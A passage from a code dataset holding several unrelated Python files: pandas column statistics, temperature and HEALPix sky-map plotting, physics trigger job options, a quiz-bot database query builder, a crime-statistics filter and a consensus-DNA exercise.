MonthCountDict\n\n###########################################################################\n### Creates a dict with a frequency distribution of dates by day of week\ndef weekday_count_dict_create(Field):\n    WeekdayCountDict = {'Mon': 0, 'Tue': 0, 'Wed': 0, 'Thu': 0, 'Fri': 0, 'Sat': 0, 'Sun': 0}\n    RefDict = {0: 'Mon', 1: 'Tue', 2: 'Wed', 3: 'Thu', 4: 'Fri', 5: 'Sat', 6: 'Sun'}\n    WeekdayCountDictPrelim = Field.dt.weekday.value_counts()\n    for key in WeekdayCountDictPrelim.index:\n        WeekdayCountDict[RefDict[key]] = WeekdayCountDictPrelim[key]\n    return WeekdayCountDict\n\n########################################################################\n### Primary function to run object field analysis\n\ndef text_stats(Field):\n    # print(Field)\n    CleanField = Field[Field.notnull()]\n    text_len = CleanField.apply(lambda x: len(str(x)))\n    word_count_split = CleanField.apply(lambda x: 
str(x).split())\n word_count_len = word_count_split.apply(lambda x: len(str(x)))\n word_list = [x for row in word_count_split for x in row]\n word_df = pd.DataFrame(word_list, columns=['Words'])\n word_counts = word_df['Words'].value_counts()\n counts = CleanField.value_counts()\n \"\"\"\n if len(counts) == 1:\n mode_value = counts\n\n else:\n mode_value = 'multiple'\n\n if word_counts[0] != word_counts[1] or len(counts) == 1:\n mode_word = word_counts.keys()[0]\n else:\n mode_word = 'multiple'\n \"\"\"\n special_character = 0\n for x in word_list:\n if x.isalpha() == False and x.isdigit() == False:\n special_character = special_character + 1\n\n TextDict = {}\n TextDict['name_field'] = Field.name\n TextDict['type_category'] = 'object'\n TextDict['dtype'] = Field.dtype\n TextDict['count_records'] = len(CleanField)\n TextDict['memoryusage_col'] = Field.memory_usage(deep=True)\n TextDict['count_missing'] = Field.isna().sum()\n TextDict['count_unique'] = Field.nunique()\n if TextDict['count_records'] > 0:\n TextDict['percent_missing'] = TextDict['count_missing'] / TextDict['count_records']\n TextDict['percent_unique'] = TextDict['count_unique'] / TextDict['count_records']\n else:\n TextDict['percent_missing'] = 0\n TextDict['percent_unique'] = 0\n TextDict['max'] = [text_len.max(), word_count_len.max()]\n TextDict['min'] = [text_len.min(), word_count_len.min()]\n TextDict['mean'] = [text_len.mean(), word_count_len.mean()]\n TextDict['mode'] = [text_len.mode()[0], word_count_len.mode()[0]]\n TextDict['q_25'] = [text_len.quantile(q=.25), word_count_len.quantile(q=.25)]\n TextDict['q_50'] = [text_len.quantile(q=.50), word_count_len.quantile(q=.50)]\n TextDict['q_75'] = [text_len.quantile(q=.75), word_count_len.quantile(q=.75)]\n TextDict['median_length'] = [text_len.median(), word_count_len.median()]\n TextDict['std_length'] = [text_len.std(), word_count_len.std()]\n TextDict['mad'] = [text_len.mad(), word_count_len.mad()]\n TextDict['sem'] = [text_len.sem(), word_count_len.sem()]\n TextDict['var'] = [text_len.var(), word_count_len.var()]\n TextDict['kurt'] = [text_len.kurtosis(), word_count_len.kurtosis()]\n TextDict['skew'] = [text_len.skew(), word_count_len.skew()]\n TextDict['autocorr'] = [text_len.autocorr(), word_count_len.autocorr()]\n\n TextDict['Total_Word_Count'] = sum(x.isalpha() for x in word_list)\n TextDict['Total_Number_Count'] = sum(x.isdigit() for x in word_list)\n TextDict['Total_Special_Count'] = special_character\n TextDict['word_list'] = word_list\n\n return (TextDict)\n\n###########################################################################\n### Primary function to run datetime field analysis\n\ndef datetime_stats(Field):\n CleanField = Field[Field.notnull()]\n # FieldNum = len(Field)\n DatetimeDict = {}\n\n DatetimeDict['memoryusage_col'] = Field.memory_usage(deep=True)\n DatetimeDict['name_field'] = Field.name\n DatetimeDict['type_category'] = 'datetime'\n DatetimeDict['dtype'] = Field.dtype\n DatetimeDict['count_records'] = len(CleanField)\n DatetimeDict['count_missing'] = Field.isna().sum()\n DatetimeDict['count_unique'] = Field.nunique()\n if DatetimeDict['count_records'] > 0:\n DatetimeDict['percent_missing'] = DatetimeDict['count_missing'] / DatetimeDict['count_records']\n DatetimeDict['percent_unique'] = DatetimeDict['count_unique'] / DatetimeDict['count_records']\n else:\n DatetimeDict['percent_missing'] = 0\n DatetimeDict['percent_unique'] = 0\n\n\n DatetimeDict['min'] = CleanField.min()\n DatetimeDict['max'] = CleanField.max()\n DatetimeDict['range'] = 
\n###########################################################################\n### Primary function to run datetime field analysis\n\ndef datetime_stats(Field):\n    CleanField = Field[Field.notnull()]\n    # FieldNum = len(Field)\n    DatetimeDict = {}\n\n    DatetimeDict['memoryusage_col'] = Field.memory_usage(deep=True)\n    DatetimeDict['name_field'] = Field.name\n    DatetimeDict['type_category'] = 'datetime'\n    DatetimeDict['dtype'] = Field.dtype\n    DatetimeDict['count_records'] = len(CleanField)\n    DatetimeDict['count_missing'] = Field.isna().sum()\n    DatetimeDict['count_unique'] = Field.nunique()\n    if DatetimeDict['count_records'] > 0:\n        DatetimeDict['percent_missing'] = DatetimeDict['count_missing'] / DatetimeDict['count_records']\n        DatetimeDict['percent_unique'] = DatetimeDict['count_unique'] / DatetimeDict['count_records']\n    else:\n        DatetimeDict['percent_missing'] = 0\n        DatetimeDict['percent_unique'] = 0\n\n\n    DatetimeDict['min'] = CleanField.min()\n    DatetimeDict['max'] = CleanField.max()\n    DatetimeDict['range'] = (CleanField.max() - CleanField.min())\n    NumDates = CleanField.astype('int64')\n    DatetimeDict['std'] = pd.to_timedelta(NumDates.std())\n    DatetimeDict['kurt'] = NumDates.kurtosis()\n    DatetimeDict['skew'] = NumDates.skew()\n    DatetimeDict['mean'] = pd.to_datetime(NumDates.mean())\n    DatetimeDict['median'] = pd.to_datetime(NumDates.median())\n    DatetimeDict['mode'] = str(CleanField.mode()[0])\n    DatetimeDict['q_25'] = pd.to_datetime(NumDates.quantile(q=.25))\n    DatetimeDict['q_50'] = pd.to_datetime(NumDates.quantile(q=.50))\n    DatetimeDict['q_75'] = pd.to_datetime(NumDates.quantile(q=.75))\n    DatetimeDict['iqr'] = DatetimeDict['q_75'] - DatetimeDict['q_25']\n    # DatetimeDict['YearCountDict'] = CleanField.dt.year.value_counts().to_dict()\n    # DatetimeDict['MonthCountDict'] = self.month_count_dict_create(CleanField)\n    # DatetimeDict['DayCountDict'] = CleanField.dt.day.value_counts().to_dict()\n    # DatetimeDict['WeekdayCountDict'] = self.weekday_count_dict_create(CleanField)\n    # This is the largest value that changes over the series, from years to days\n    DatetimeDict['largest_measurable_value'] = largest_value_change(DatetimeDict['min'], DatetimeDict['max'])\n    # DatetimeDict['outlier'] = self.outlier_detection(Field,'Date')\n    return DatetimeDict\n\n###########################################################################\n### Primary function to run numeric field analysis\n\ndef numeric_stats(Field):\n    CleanField = Field[Field.notnull()]\n    NumericDict = {}\n\n    NumericDict['memoryusage_col'] = Field.memory_usage(deep=True)\n    NumericDict['name_field'] = Field.name\n    NumericDict['type_category'] = 'numeric'\n    NumericDict['dtype'] = Field.dtype\n    NumericDict['count_records'] = len(CleanField)\n    NumericDict['count_missing'] = Field.isna().sum()\n    NumericDict['count_unique'] = Field.nunique()\n    if NumericDict['count_records'] > 0:\n        NumericDict['percent_missing'] = NumericDict['count_missing'] / NumericDict['count_records']\n        NumericDict['percent_unique'] = NumericDict['count_unique'] / NumericDict['count_records']\n    else:\n        NumericDict['percent_missing'] = 0\n        NumericDict['percent_unique'] = 0\n\n\n    NumericDict['min'] = CleanField.min()\n    NumericDict['max'] = CleanField.max()\n    NumericDict['median'] = CleanField.median()\n    NumericDict['mean'] = CleanField.mean()\n    NumericDict['std'] = CleanField.std()\n    NumericDict['mad'] = CleanField.mad()\n    NumericDict['sem'] = CleanField.sem()\n    NumericDict['var'] = CleanField.var()\n    NumericDict['q_25'] = CleanField.quantile(q=.25)\n    NumericDict['q_50'] = CleanField.quantile(q=.5)\n    NumericDict['q_75'] = CleanField.quantile(q=.75)\n    NumericDict['kurt'] = CleanField.kurtosis()\n    NumericDict['skew'] = CleanField.skew()\n    # Need to decide how many modes we will accept. Something like \"ID\" is unique and would therefore show a VERY long list.\n    NumericDict['mode'] = CleanField.mode()[0]\n    # NumericDict['outlier'] = self.outlier_detection(Field,'Numeric')\n    return NumericDict\n
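\n###########################################################################\n### Illustrative sketch (added; not part of the original module): a quick smoke\n### test for numeric_stats above on a tiny hand-made Series. Assumes pandas is\n### imported as pd; the sample values are made up.\n\ndef _demo_numeric_stats():\n    s = pd.Series([1.0, 2.0, 2.0, 3.0, None], name='example')\n    stats = numeric_stats(s)\n    print(stats['count_records'], stats['count_missing'], stats['mode'])  # 4 1 2.0\n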
\n###########################################################################\n### The primary Variable function - DataFrame in, dictionary of fields and stats out. The output for each type is a series\n### but can easily be made into a dictionary by changing variable_stats_dict to use the dictionary form of each type.\n\ndef variable_stats(dataframe):\n\n    df_numeric = dataframe.select_dtypes(include=['int64', 'float64'])\n    numeric_stat = df_numeric.apply(lambda x: numeric_stats(x))\n    numeric_stat_dict = numeric_stat.to_dict()\n\n    df_datetime = dataframe.select_dtypes(include=['datetime'])\n    datetime_stat = df_datetime.apply(lambda x: datetime_stats(x))\n    datetime_stat_dict = datetime_stat.to_dict()\n\n    df_text = dataframe.select_dtypes(include=['object'])\n    text_stat = df_text.apply(lambda x: text_stats(x))\n    text_stat_dict = text_stat.to_dict()\n\n    variable_stats_dict = {'Numeric': numeric_stat, 'Datetime': datetime_stat, 'Text': text_stat}\n\n    return variable_stats_dict\n\n###############################################################################\n\n\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":16562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"542073428","text":"import pandas as pd\r\nimport datetime as dt\r\nimport os\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef get_folder_name(keyword):\r\n    data_container = []\r\n    for foldername in os.listdir():\r\n        if keyword in foldername:\r\n            data_container.append(foldername)\r\n        else:\r\n            pass\r\n    return data_container\r\n\r\ndef read_all_csv(folder_list, selected_column):\r\n    data_container = []\r\n    total_files = len(folder_list)\r\n    counter = 1\r\n    for i in folder_list:\r\n        df = pd.read_csv(i + '/OpenStudio/' + i + '/ModelToIdf/in.csv', usecols=selected_column)\r\n        df['Date/Time'] = create_time()\r\n        df1 = df.set_index(['Date/Time'])\r\n        df1.index = pd.to_datetime(df1.index)\r\n        df1.columns = [i]\r\n        data_container.append(df1)\r\n\r\n        print(f'{counter}/{total_files} DataFrame created, {total_files - counter} more files')\r\n        counter +=1\r\n    print('Generating DataFrame done\\nConcatenating...')\r\n    dataframe = pd.concat(data_container, axis=1)\r\n    print(\"DataFrame ready\")\r\n    return dataframe\r\n\r\ndef create_time():\r\n    date_time_column = []\r\n    base_time = dt.datetime(2019, 1, 1)\r\n    timedelta = dt.timedelta(hours=1)\r\n    for i in range(8760):\r\n        date_time_column.append(str(base_time))\r\n        base_time +=timedelta\r\n    return date_time_column\r\n\r\n#def plot_option(df):\r\n#    resample = ''\r\n#    while (resample is not 'daily') or (resample is not 'monthly') or (resample is not 'hourly'):\r\n#        resample = input(\"Choose your resample mapping (hourly, daily, or monthly): \")\r\n#        if resample == 'hourly':\r\n#            axes = df.resample(\"H\").mean().plot(figsize=(18,6))\r\n#            return axes\r\n#        elif resample == 'daily':\r\n#            axes = df.resample(\"D\").mean().plot(figsize=(18,6))\r\n#            return axes\r\n#        elif resample == 'monthly':\r\n#            axes = df.resample(\"M\").mean().plot(figsize=(18,6))\r\n#            return axes\r\n\r\nif __name__ == '__main__':\r\n    temperature_column = ['Date/Time', 'ROOM1:Zone Mean Air Temperature [C](Hourly)']\r\n    file = get_folder_name('00')\r\n    df = read_all_csv(file, temperature_column)\r\n    ax = df.resample(\"D\").mean().plot(figsize=(18,6))\r\n    ax.legend(loc=2)\r\n    ax.set_title(label='Far East Flora Dome Indoor Air Temperature Comparison', loc='center')\r\n    ax.set_xlabel(xlabel='Date/Time')\r\n    ax.set_ylabel(ylabel='Celsius Degree')\r\n\r\n
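    # Illustrative note (added; not part of the original script): the 'D' resample\r\n    # above downsamples the 8760 hourly readings to daily means before plotting;\r\n    # a monthly view instead would be, e.g.:\r\n    # ax = df.resample('M').mean().plot(figsize=(18, 6))\r\n    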
plt.show()","sub_path":"TemperaturePlot.py","file_name":"TemperaturePlot.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"234745708","text":"# main jobOption\n\n\nfrom AthenaCommon.AthenaCommonFlags import athenaCommonFlags\nathenaCommonFlags.FilesInput=[\"root://eosatlas//eos/atlas/atlascerngroupdisk/trig-daq/validation/test_data/valid1.117050.PowhegPythia_P2011C_ttbar.merge.HITS.e2658_s1967_s1964/RDO.0119996._000032.pool.root.1\"]\n\njp.AthenaCommonFlags.PoolESDOutput=\"theoutput_EFonly.ESD.pool.root\"\nif not 'rec.doWriteESD' in dir():\n rec.doWriteESD=True\n\njp.AthenaCommonFlags.EvtMax=-1\n\nrec.doWriteRDO=False\nrec.doWriteAOD=False \nrec.doAOD=False \nrec.doWriteTAG=False \nrec.doTrigger=True\n\n\ndef muonOnly():\n TriggerFlags.Slices_all_setOff()\n# TriggerFlags.MuonSlice.setAll()\n TriggerFlags.MuonSlice.signatures=[['mu0noL1_fsperf', '', [], ['Muon'], ['RATE:SingleMuon', 'BW:Muon'],-1]]\n\nfrom TriggerJobOpts.TriggerFlags import TriggerFlags\nTriggerFlags.doHLT=True\n\nfrom TriggerMenu.menu.GenerateMenu import GenerateMenu\nGenerateMenu.overwriteSignaturesWith(muonOnly)\n\n\n# main jobOption\n\ninclude (\"RecExCommon/RecExCommon_topOptions.py\")\n\nStoreGateSvc = Service( \"StoreGateSvc\" )\nStoreGateSvc.Dump = True\n\nfrom MuonTruthAlgs.MuonTruthAlgsConf import MuonDetailedTrackTruthMaker\nfrom TrkTruthAlgs.TrkTruthAlgsConf import TrackTruthSelector\nfrom TrkTruthAlgs.TrkTruthAlgsConf import TrackParticleTruthAlg\n\ncols = [\"HLT_TrackCollection_forCB\",\"HLT_TrackCollection_MuonEFCombTrkTracks\"]\ncolsTP = [\"HLT_xAOD__TrackParticleContainer_MuonEFInfo_ExtrapTrackParticles\",\"HLT_xAOD__TrackParticleContainer_MuonEFInfo_CombTrackParticles\"]\n\ntopSequence += MuonDetailedTrackTruthMaker(name=\"TrigMuEFonlyDetailedTrackTruthMaker\", TrackCollectionNames = cols,OutputLevel=INFO )\n\nfor i in range(0, len(cols) ):\n topSequence += TrackTruthSelector(name= cols[i] + \"Selector\",\n DetailedTrackTruthName = cols[i] + \"Truth\",\n OutputName = cols[i] + \"Truth\",OutputLevel=INFO )\n topSequence += TrackParticleTruthAlg(name = cols[i]+\"TruthAlg\",\n TrackTruthName=cols[i]+\"Truth\",\n TrackParticleName = colsTP[i],OutputLevel=INFO )\nfrom MuonTruthAlgs.MuonTruthAlgsConf import Muon__MuonTruthDecorationAlg\ntopSequence += Muon__MuonTruthDecorationAlg(\"EFonlyMuonTruthDecorationAlg\",\n MuonTruthParticleContainerName = \"HLT_EFMuonTruthParticle\",\n CreateTruthSegments = False,OutputLevel=INFO)\nfrom MuonTruthAlgs.MuonTruthAlgsConf import MuonTruthAssociationAlg\ntopSequence += MuonTruthAssociationAlg(\"EFonlyMuonTruthAssociation\",\n MuonContainerName = \"HLT_xAOD__MuonContainer_MuonEFInfo\",\n MuonTruthParticleContainerName = \"HLT_EFMuonTruthParticle\",OutputLevel=INFO)\n\ndoMon = True\nif( doMon ):\n from MuonPhysValMonitoring.MuonPhysValMonitoringConf import MuonPhysValMonitoring__MuonPhysValMonitoringTool\n tool1 = MuonPhysValMonitoring__MuonPhysValMonitoringTool(\"EFonlyMuonPhysValMonitoringTool\")\n tool1.EnableLumi = False\n tool1.DetailLevel = 1\n tool1.OutputLevel = INFO\n tool1.MuonContainerName = \"HLT_xAOD__MuonContainer_MuonEFInfo\"\n tool1.MuonTruthParticleContainerName = \"HLT_EFMuonTruthParticle\"\n \n ToolSvc += tool1\n\n from AthenaMonitoring.AthenaMonitoringConf import AthenaMonManager\n topSequence += AthenaMonManager( \"PhysValMonManager\" ,OutputLevel=DEBUG)\n\n from AthenaCommon.AppMgr import ServiceMgr\n from GaudiSvc.GaudiSvcConf import THistSvc\n ServiceMgr 
+= THistSvc()\n svcMgr.THistSvc.Output += [\"EFonlyMuonMonExample DATAFILE='EFonlyMuonMonExample.root' OPT='RECREATE'\"]\n \n monMan = topSequence.PhysValMonManager\n monMan.ManualDataTypeSetup = True\n monMan.DataType = \"monteCarlo\"\n monMan.Environment = \"altprod\"\n monMan.ManualRunLBSetup = True\n monMan.Run = 1\n monMan.LumiBlock = 1\n \n monMan.FileKey = \"EFonlyMuonMonExample\"\n monMan.AthenaMonTools += [ tool1 ]\n\n\n\n","sub_path":"athena/Trigger/TrigValidation/TrigMuonValidation/share/TrigMuonValidation_RTT_options_EFonly.py","file_name":"TrigMuonValidation_RTT_options_EFonly.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"33805507","text":"from collections import namedtuple\nimport psycopg2\n\nBonus = namedtuple('Bonus',\n 'id,number,round,category_id,subcategory_id,quinterest_id,tournament_id,leadin,created_at,updated_at,errors_count,formatted_leadin')\nBonusPart = namedtuple('BonusPart',\n 'id,bonus_id,text,answer,formatted_text,formatted_answer,created_at,updated_at,number,wikipedia_url')\nTournament = namedtuple('Tournament', 'id,year,name,difficulty,quality,address,type,link,created_at,updated_at')\nTossup = namedtuple('Tossup', 'id,text,answer,number,tournament_id,category_id,subcategory_id,round,created_at,updated_at,'\n 'quinterest_id,formatted_text,errors_count,formatted_answer,wikipedia_url')\nconnection = None\n\ncategory_id_to_alias_map = {\n 'geo': 20,\n 'geography': 20,\n 'hist': 18,\n 'history': 18,\n 'lit': 15,\n 'literature': 15,\n 'm': 14,\n 'myth': 14,\n 'p': 25,\n 'philo': 25,\n 'r': 19,\n 'religion': 19,\n 'sci': 17,\n 'science': 17,\n 'ss': 22,\n 'socialscience': 22,\n 'trash': 16,\n 'ce': 26,\n 'currentevents': 26,\n 'fa': 21,\n 'finearts': 21\n}\n\nsubcategory_id_to_alias_map = {\n # 40: ['cea', 'ceamerican'],\n # 42: ['ceo', 'ceother'],\n # 35: ['faam', 'fineartsamerican'],\n # 27: ['faav', 'fineartsaudiovisual'],\n # 8: ['faa', 'fineartsauditory'],\n # 45: ['fab', 'fineartsbritish'],\n # 50: ['fae', 'fineartseuropean'],\n # 77: ['fao', 'opera', 'fineartsopera'],\n # 25: ['faot', 'fineartsother'],\n # 2: ['fav', 'fineartsvisual'],\n # 43: ['faw', 'fineartsworld'],\n # 38: ['geoa', 'geoamerican'],\n 'bio': 14,\n 'biology': 14,\n 'chem': 5,\n 'chemistry': 5,\n 'cs': 23,\n 'math': 26,\n 'physics': 18\n\n # 14: ['bio', 'biology'],\n # 5: ['chem', 'chemistry'],\n # 23: ['cs', 'compsci', 'computerscience'],\n # 26: ['math'],\n # 10: ['osci', 'otherscience'],\n # 18: ['physics']\n # TODO finish this later i'm lazy\n}\n\nclass GlobalState:\n sessions = []\n skip_message = None\n\nstate = GlobalState()\n\ndef get_global_state():\n global state\n return state\n\ndef get_db_connection():\n global connection\n if connection is None:\n connection = psycopg2.connect('dbname=quizdb user=postgres')\n return connection\n\n\ntournaments = []\ndef get_tournaments():\n global tournaments\n if len(tournaments) == 0:\n conn = get_db_connection()\n tournaments = read_tournaments(conn)\n return tournaments\n\ndef read_tournaments(conn):\n cursor = conn.cursor()\n cursor.execute('SELECT * FROM tournaments')\n return list(map(Tournament._make, cursor.fetchall()))\n\n\ntournament_series = {'scop': 'scop', 'pace': 'pace', 'rmbat': 'rmbat', 'bhsat': 'bhsat', 'acf_regs': 'acf regionals', 'acf_fall': 'acf fall', 'co': 'chicago open'}\n\n\ndef get_bonus_batch(conn, arguments):\n # Who needs ORMs anyway amirite? 
This is literally the jankiest shit i've ever written but it works so...\n # TODO: use an ORM\n\n difficulties = []\n categories = []\n subcategories = []\n selected_tournaments = []\n for arg in arguments:\n if arg[0].isdigit():\n # Difficulty or year\n # Check if range\n if len(arg.split('-')) > 1:\n values = arg.split('-')\n difficulties = list(range(int(values[0]), int(values[1]) + 1))\n elif 0 < int(arg) < 10:\n difficulties = [int(arg)]\n else:\n # assume year\n if selected_tournaments[-1][1] == -1:\n selected_tournaments[-1] = (selected_tournaments[-1][0], int(arg))\n else:\n # Category, subcategory, or tournament\n for k in subcategory_id_to_alias_map.keys():\n if arg == k:\n subcategories.append(str(subcategory_id_to_alias_map[k]))\n for k in category_id_to_alias_map.keys():\n if arg == k:\n categories.append(str(category_id_to_alias_map[k]))\n if arg in tournament_series:\n selected_tournaments.append((tournament_series[arg], -1))\n\n category_conditional = '('\n category_conditional += ' OR '.join([f'bonuses.category_id={category}' for category in categories])\n category_conditional += ')'\n\n difficulty_conditional = '('\n difficulty_conditional += ' OR '.join([f'tournaments.difficulty={difficulty}' for difficulty in difficulties])\n difficulty_conditional += ')'\n\n subcategory_conditional = '('\n subcategory_conditional += ' OR '.join([f'bonuses.subcategory_id={subcategory}' for subcategory in subcategories])\n subcategory_conditional += ')'\n\n matching_tournament_records = []\n\n for t in selected_tournaments:\n if t[1] == -1:\n matching_tournament_records.extend([i for i in get_tournaments() if t[0] in i.name.lower()])\n else:\n matching_tournament_records.extend([i for i in get_tournaments() if t[0] in i.name.lower() and str(t[1]) in i.name.lower()])\n\n if len(matching_tournament_records) == 0 and len(selected_tournaments) != 0:\n raise Exception('No tournament matches your query')\n\n tournament_conditional = '(' if len(matching_tournament_records) > 0 else ''\n tournament_conditional += ' OR '.join([f'tournaments.id={t.id}' for t in matching_tournament_records]) + ')'\n\n if len(difficulties) > 0:\n sql_command = 'SELECT bonuses.* FROM bonuses,tournaments WHERE bonuses.tournament_id=tournaments.id AND ' + difficulty_conditional\n if len(subcategories) > 0:\n sql_command += ' AND ' + subcategory_conditional\n if len(categories) > 0:\n sql_command += ' AND ' + category_conditional\n if len(selected_tournaments) > 0:\n sql_command += ' AND ' + tournament_conditional\n elif len(subcategories) > 0 or len(categories) > 0 or len(tournament_conditional) > 0:\n sql_command = 'SELECT bonuses.* FROM bonuses,tournaments WHERE bonuses.tournament_id=tournaments.id'\n if len(subcategories) > 0:\n sql_command += ' AND ' + subcategory_conditional\n if len(categories) > 0:\n sql_command += ' AND ' + category_conditional\n if len(selected_tournaments) > 0:\n sql_command += ' AND ' + tournament_conditional\n else:\n sql_command = 'SELECT * FROM bonuses'\n\n sql_command += \" ORDER BY RANDOM() LIMIT 20;\"\n print(f'Executing {sql_command}')\n return get_bonus_batch_raw(conn, sql_command)\n\n\ndef get_bonus_batch_raw(conn, sql_command):\n bonuses = []\n cursor = conn.cursor()\n cursor.execute(sql_command)\n for bonus in map(Bonus._make, cursor.fetchall()):\n cursor.execute(f\"SELECT * FROM bonus_parts WHERE bonus_id={bonus.id} ORDER BY number\")\n bonus_parts = list(map(BonusPart._make, cursor.fetchall()))\n if len(bonus_parts) == 0:\n # Unusable\n continue\n cursor.execute(f'SELECT * FROM 
tournaments WHERE id={bonus.tournament_id}')\n        tournament = list(map(Tournament._make, cursor.fetchall()))\n        assert len(tournament) == 1\n        bonuses.append((bonus, bonus_parts, tournament[0]))\n\n    return bonuses\n\n\n\n\n\n","sub_path":"pkbot-master/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"239573308","text":"import pandas as pd\nimport numpy as np\n\n#declaration\n#get data from https://www.bka.de/DE/AktuelleInformationen/StatistikenLagebilder/PolizeilicheKriminalstatistik/PKS2018/Standardtabellen/standardtabellenTatverdaechtige.html?nn=108686\n#download excel\nfile = pd.read_excel(\"STD-TV-01-T20-Tatverdaechtige_excel.xlsx\" , usecols =\"B,C,D\", skiprows=8)\nsave = pd.DataFrame(columns=['Verbrechen'])\n#use a name other than 'len' so the builtin is not shadowed\nshape = file.shape\ncrimes = [[],[],[],[],[]]\ntemp = 0\n\n\nfor i in range(0, shape[0], 3):\n\n    #evaluate percent\n    \n    if file.iloc[i+1,2] > 0:\n        temp = file.iloc[i+1,2]/file.iloc[i+2,2]*100\n    else:\n        temp = 0\n\n    #keep rows in the chosen percentage band; adjust the range as needed\n    if temp>50 and temp<=100:\n        crimes[0].append(str(file.iloc[i,0]))\n        crimes[1].append(temp.round(2))\n        crimes[2].append(file.iloc[i,2])\n        crimes[3].append(file.iloc[i+1,2])\n        crimes[4].append(file.iloc[i+2,2])\n    \n#add to pandas dataframe \nsave['Verbrechen'] = crimes[0]\nsave['Prozentualer Anteil'] = crimes[1]\nsave['Anzahl Männer'] = crimes[2]\nsave['Anzahl Frauen'] = crimes[3]\nsave['Gesamt'] = crimes[4]\n\nprint(save)\nsave.to_csv('result.csv')","sub_path":"women_over_50.py","file_name":"women_over_50.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"637605191","text":"import sys\nfrom itertools import permutations\n\nN,M = map(int,input().split())\nDNAs = []\nfor _ in range(N):\n    DNAs.append(input().rstrip())\n\nS=['A','C','G','T']\nresult_DNA = []\ndiff=0\nfor i in range(M):\n    temp=[]\n    max_c=0\n    ans=''\n    for dna in DNAs:\n        temp.append(dna[i])\n\n    for s in S:\n        c = temp.count(s)\n        if c > max_c:\n            max_c = c\n            ans=s\n    \n    for dna in DNAs:\n        if dna[i] != ans:\n            diff+=1\n\n    result_DNA.append(ans)\n\nprint(''.join(result_DNA))\nprint(diff)\n\n","sub_path":"백준/Python/알고파/완전탐색,백트래킹/1969%(DNA).py","file_name":"1969%(DNA).py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"407105","text":"import healpy as hp\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.colors import LogNorm\n\n# Set the number of sources and the coordinates for the input\n#nsources = int(2664001)\n#nsources = int(3149)\nnsources = int(1268174)\n\nnside = 64\nnpix = hp.nside2npix(nside)\n\n# npix= 12*nside^2\n# Coordinates and the density field f\n#thetas = np.random.random(nsources) * np.pi\n#phis = np.random.random(nsources) * np.pi * 2.\n\nfs = np.random.randn(nsources)\n\nwith open(\"./eventFile_data_noHead_eta08.txt\") as inputFile:\n    lines = inputFile.readlines()\n    #print (lines[1].split()[1])\nthetas=[]\nphis=[]\nfor i in range(nsources): \n    thetas.append(float(lines[i+1].split()[1]))\n    phis.append(float(lines[i+1].split()[2]))\n    #if(thetas[0]<0 or thetas[0]>3.14): \n    #    print(\"theta out of range\")\n#print(thetas)\n\n# Go from angles to HEALPix pixel indices\nindices = hp.ang2pix(nside, thetas, phis)\n
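\n# Illustrative note (added; not part of the original script): ang2pix converts\n# co-latitude theta in [0, pi] and longitude phi (radians) to pixel indices,\n# RING ordering by default, so the fill loop below is just a per-pixel event\n# count scaled by npix/nsources; a vectorised equivalent would be, e.g.:\n# hpxmap = np.bincount(indices, minlength=npix) * (float(npix) / nsources)\n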
\n# Initialize the map and fill it with the values\nhpxmap = np.zeros(npix, dtype=float)  # plain float: the np.float alias is deprecated\nfor i in range(nsources):\n    #hpxmap[indices[i]] += fs[i]\n    #hpxmap[indices[i]] += 1.0\n    hpxmap[indices[i]] += 12.0*nside*nside/nsources\n#for j in range(npix):\n#    if hpxmap[j] < 0.000001:\n#        hpxmap[j] = 0.000001\n\nDPI = 100\nSIZE = 800\n\n# Inspect the map\n#plt.figure(1)\n\n#hp.mollview(hpxmap, xsize = SIZE)\n#map_ring = hp.pixelfunc.reorder(hpxmap, inp='NEST', out='RING')\nhp_smoothed = hp.sphtfunc.smoothing(hpxmap, fwhm=np.radians(5))\n#hp_smoothed = hp.sphtfunc.smoothing(hpxmap, fwhm=np.radians(5.0*3.14/180))\n#hp_smoothed = hp.smoothing(hpxmap, fwhm=np.radians(5.0*3.14/180))\n#hp_smoothed = hp.sphtfunc.smoothing(hpxmap, sigma=np.radians(5.0*3.14/180))\n#hp_smoothed = hp.smoothing(hpxmap, fwhm=60, arcmin=True)\n#hp.mollview(hp_smoothed, nest=False, xsize = SIZE, cmap=cm.jet, norm = 'hist', title='CMS UCC smoothed')\n#cmap_tmp = cm.jet\n#cmap_tmp.set_bad(\"gray\")\n#cmap_tmp.set_under(\"white\")\nhp.mollview(hp_smoothed, nest=False, xsize = SIZE, cmap=cm.jet, norm=\"hist\", title='CMS UCC smoothed') #jet/rainbow/seismic/bwr; norm=\"hist\"/LogNorm()\nhp.graticule()\n#plt.savefig(\"plot_uccData_3149m_smoothed.png\", dpi = DPI)\n#plt.savefig(\"plot_rapidity08_uccData_allEvents_smoothed.png\", dpi = DPI)\nplt.savefig(\"plot_rapidity08_uccData_allEvents_withnormhist_smoothed.png\", dpi = DPI)\n#plt.savefig(\"plot_uccData_oneEvents_smoothed.png\", dpi = DPI)\n\n\n'''\n#plt.figure(2)\n# Get the power spectrum\nCl = hp.anafast(hpxmap)\n#print(Cl)\nplt.plot(Cl)\nplt.ylabel('C_{l}')\nplt.savefig('plot_uccData_power_spectrum.png')\n'''\n\n","sub_path":"healpy/tutorial/pbpbUCC/rapidity08_uccData_power_spectrum.py","file_name":"rapidity08_uccData_power_spectrum.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
